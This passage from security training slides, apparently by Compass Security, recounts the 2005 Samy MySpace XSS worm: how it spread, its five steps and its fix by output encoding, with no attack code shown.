- Sent all contacts to the author of the worm

Samy Worm (October 2005)
- Also called the myspace worm
- Added the words "Samy is my hero" to the victim's profile
- Spread by viewing the profile of a victim. If a user viewed the profile of a victim, he also became a victim

Slide 84

Samy Worm

In October 2005 the samy worm took down myspace.com

Myspace is not an AJAX application

The Samy Worm parsed the data it needed from the websites.

Approximately 1'000'000 myspace users were infected in 20 hours

"But most of all, samy is my hero" was written on every infected profile

Slide 85

Samy Worm

The worm performed 5 steps for every user
- Fetch victim's profile
- Update victim's profile
- Confirm profile update
- Invite samy as a friend
- Confirm samy invitation

Problem was solved by output encoding

There are still infected profiles with the words "but most of all, samy is my hero" and the encoded javascript code on them.
- Google: "but most of all, samy is my hero" site:myspace.com

Slide 86

Compass Security AG

Compass Security Network Computing
Postfach 1628
Glärnischstrasse 7
CH - 8640 Rapperswil

team@csnc.ch | www.csnc.ch | +41 55 214 41 60

Secure File Exchange: www.csnc.ch/filebox

PGP-Fingerprint: